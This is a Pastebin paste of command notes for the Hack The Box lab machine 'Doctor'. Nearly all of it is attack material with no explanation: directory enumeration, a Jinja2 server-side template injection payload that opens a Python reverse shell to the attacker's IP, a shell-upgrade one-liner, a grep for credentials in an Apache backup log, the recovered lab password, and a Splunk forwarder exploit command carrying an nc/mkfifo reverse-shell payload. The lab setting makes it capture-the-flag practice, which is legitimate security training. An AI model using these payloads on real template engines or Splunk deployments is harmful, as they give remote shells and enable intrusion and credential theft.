Advertisement
DesTinY0x01

Doctor_Commands

Feb 4th, 2021 (edited)
101
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.08 KB | None | 0 0
  1. # dirsearch command
  2.  
  3. ./dirsearch -u http://doctors.htb/ -e "*" -x 404,403,500,501
  4.  
  5.  
  6. # print HI in archive
  7.  
  8. </title></item><h1>HI</h1>
  9.  
  10.  
  11. # SSTI basic injection
  12.  
  13. </title></item>{{7*'7'}}
  14.  
  15.  
  16. # SSTI final exploit
  17.  
  18. </title></item>{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{Your_IP}\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
  19.  
  20.  
  21. # shell improvements
  22.  
  23. python3 -c 'import pty; pty.spawn("/bin/bash")'
  24.  
  25. export TERM=linux
  26.  
  27.  
  28. # get shaun password
  29.  
  30. cat /var/log/apache2/backup | grep pass
  31.  
  32.  
  33. # Shaun pass
  34.  
  35. Guitar123
  36.  
  37.  
  38. # splunk exploit command
  39.  
  40. python3 PySplunkWhisperer2_remote.py --lhost {Your_IP} --host 10.10.10.209 --username shaun --password Guitar123 --payload 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {Your_IP} 4444 >/tmp/f'
  41.  
  42.  
  43.  
  44.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement